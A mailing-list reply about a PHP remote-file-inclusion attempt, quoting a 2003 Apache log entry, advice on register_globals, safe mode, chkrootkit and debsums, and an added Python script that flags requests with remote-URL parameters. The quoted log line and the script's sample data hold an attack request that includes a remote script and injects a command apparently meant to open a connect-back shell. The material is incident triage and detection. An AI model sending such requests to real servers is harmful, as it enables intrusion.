> If you have register globals off *or* safe mode on, this particular
> exploit is useless.
>
> If you had register globals on and safe mode off then he could run
> arbitrary programs as your Apache user. It's possible he could run a
> local root exploiting program, but that's not as likely.
>
> > 200.214.140.237 - - [15/Nov/2003:00:48:00 -0200] "GET
> > /~joeuser/index.php?area=http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;./db%20200.214.140.237%204444
> > HTTP/1.1" 200 4112 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4
> > i686) Opera 7.11 [en]"
>
> I think the script is broken because that <db> file is not currently
> found.
>
> It's a really stupid script, it could have all been done with one file
> if he actually knew how to code PHP.
>
> How to tell if he got to root? The only really sure way is to use a
> known-secure boot medium to examine every file on your filesystem that
> might be run with root privileges...
>
> Or you can check to see if he made it easy for him to find with the
> <chkrootkit> and <debsums> packages. There are probably better options
> which people on this list could suggest.
>
> --
> Tom Goulet                    mail: [EMAIL PROTECTED]
> UID0 Unix Consulting          web: em.ca/uid0/

Sorry forgot to tell. The chkrootkit and the debsums all ok.
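
As an added example (not part of either poster's message): a Python scan of Apache combined-format access logs for requests like the one quoted above, where a query parameter's decoded value is a remote URL. The function name, the finding fields and the second log line are constructed for illustration; a hit is a lead to triage, since a 200 status alone does not show the include ran.

```python
import re
from urllib.parse import unquote

# Apache combined log: host ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) \S+')
REMOTE_URL = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

def find_remote_includes(lines):
    """Return one finding per query parameter whose decoded value is a remote URL."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format request line
        client, when, _method, target, status = m.groups()
        _path, _, query = target.partition("?")
        # Decode each name=value pair; the value itself may contain '?' or '='.
        params = {}
        for pair in query.split("&"):
            name, _, value = pair.partition("=")
            if name:
                params[name] = unquote(value)
        for name, value in params.items():
            if REMOTE_URL.match(value):
                others = {k: v for k, v in params.items() if k != name}
                findings.append({"client": client, "time": when, "status": int(status),
                                 "param": name, "url": value, "others": others})
    return findings

SAMPLE_LOG = [
    # Request line quoted in the thread above, rejoined onto one line.
    '200.214.140.237 - - [15/Nov/2003:00:48:00 -0200] "GET /~joeuser/index.php?area='
    'http://bywordonline.com/sc/app.txt?&cmd=cd%20/tmp;./db%20200.214.140.237%204444 '
    'HTTP/1.1" 200 4112 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Linux 2.4.18-bf2.4 '
    'i686) Opera 7.11 [en]"',
    # Constructed benign request for contrast.
    '192.0.2.10 - - [15/Nov/2003:00:50:12 -0200] "GET /~joeuser/index.php?area=news '
    'HTTP/1.1" 200 3987 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in find_remote_includes(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} status={f['status']} "
              f"{f['param']}={f['url']} others={f['others']}")
```

Legitimate parameters that carry URLs (redirect targets, for instance) will also match, so review the accompanying parameters and the script that received them.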